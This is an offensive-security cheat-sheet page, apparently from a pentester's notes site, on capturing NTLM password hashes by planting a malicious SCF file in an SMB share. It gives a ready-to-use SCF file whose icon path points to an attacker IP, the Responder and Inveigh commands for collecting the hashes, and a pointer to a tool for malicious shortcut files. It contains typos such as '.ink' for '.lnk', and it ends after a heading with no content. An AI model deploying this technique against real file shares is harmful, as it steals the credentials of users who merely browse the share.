githubEdit

smb-scf-and-ink-file

SCF on a file share (capture hashes)

Put a malicious file in the smb share

@ appears on top (Put in filename as a first character)

@inventry.scf

[Shell]
Command=2
IconFile=\\10.10.14.3\share\legit.ico
[Taskbar]
Command=ToggleDesktop

Capture hashes

Responder:

sudo responder -wrf -v -I tun0

Inveigh:

Import-Module .\Inveight.ps1
Invoke-Inveigh -ConsoleOutput Y -FileOutput Y

InveighZero

As soon as a user browser SMB shares, we will get password hash

Sudo responder -wrf -v -I tun0

Use .ink file to capture hash

Generate .ink file: https://github.com/dievus/lnkbomb

Create a malicious desktop.ink icon:

Last updated